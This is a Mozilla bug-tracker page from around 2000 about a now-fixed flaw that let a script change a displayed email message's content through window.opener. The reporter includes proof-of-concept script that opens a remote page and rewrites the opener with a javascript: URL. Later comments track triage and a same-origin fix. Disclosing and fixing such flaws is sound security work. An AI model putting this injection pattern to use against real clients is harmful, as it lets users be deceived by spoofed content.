Spoofing email messages

VERIFIED FIXED in M17

Status

()

Core
Security
P3
normal
VERIFIED FIXED
18 years ago
17 years ago

People

(Reporter: joro, Assigned: Mitchell Stoltz (not reading bugmail))

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [nsbeta2+], URL)

Attachments

(1 attachment)

(Reporter)

Description

18 years ago
It is possible to spoof email messages by manipulating the location object of
the currently displayed message. This is done by opening a window which does:
opener.location='javascript:s="<H1>Spoofed</H1>"'
The code that must be included in HTML message is:
-------------------------------------------
<SCRIPT>
a=window.open("ht"+"tp://www.nat.bg/~joro/mozilla/openlocation.html");
</SCRIPT>
-------------------------------------------

-----"http://www.nat.bg/~joro/mozilla/openlocation.html"------
<SCRIPT>
setTimeout("opener.location='javascript:s=\"<H1>Spoofed</H1>\"'; ",6000);
// It would be better to use setInterval(), but Mozilla crashes on my box in
this case
</SCRIPT>
--------------------------------------------------------------

Updated

18 years ago
Status: NEW → ASSIGNED
Target Milestone: M15

Comment 1

18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General

Updated

18 years ago
Keywords: beta2

Comment 2

18 years ago
Branch time for M15 has come... and so I'm moving this to M16 (Norris is out 
this week).
Target Milestone: M15 → M16

Updated

18 years ago
Keywords: nsbeta2
(Assignee)

Comment 3

18 years ago
Bulk reassigning most of norris's bugs to mstoltz.
Assignee: norris → mstoltz
Status: ASSIGNED → NEW
(Assignee)

Comment 4

18 years ago
THis looks directly related to 37907. The fix is probably the same. I will
verify that the sameOrigin check is being done.
(Assignee)

Updated

18 years ago
Status: NEW → ASSIGNED

Comment 5

18 years ago
Putting on [nsbeta2+] radar for beta2 fix.
Whiteboard: [nsbeta2+]

Comment 6

18 years ago
Changed QA contact to Cathy.
QA Contact: junruh → czhang
(Assignee)

Comment 7

18 years ago
Created attachment 9041 [details] [diff] [review]
Proposed Patch - Needs Review
(Assignee)

Comment 8

18 years ago
argh...disregard that patch...posted to the wrong bug.

Comment 9

18 years ago
it is not fixed yet. 
http://cathyz/bugs/23516.html
this page opens a window in another domain http://cathyz2/bugs/1.html, 
23516.html is spoofed by script in 1.html, same origin is not checked here I 
guess
Status: ASSIGNED → NEW
(Assignee)

Comment 10

18 years ago
Moving to M17. Not an M16 stopper.
Target Milestone: M16 → M17

Comment 11

18 years ago
Assigning QA to czhang
(Assignee)

Comment 12

18 years ago
Marking Confidential as per jar. jtaylor is attempting to reproduce this bug.
Group: netscapeconfidential?
Status: NEW → ASSIGNED
(Assignee)

Comment 13

18 years ago
I think this one is also dependent on 28443. jtaylor, can you confirm that this
one is fixed as of 7/6?
Depends on: 28443

Comment 14

18 years ago
Looks fixed with 2000070608 build.
(Assignee)

Comment 15

18 years ago
Fixed.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 16

18 years ago
verified, no spoofing
Status: RESOLVED → VERIFIED
(Assignee)

Comment 17

17 years ago
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.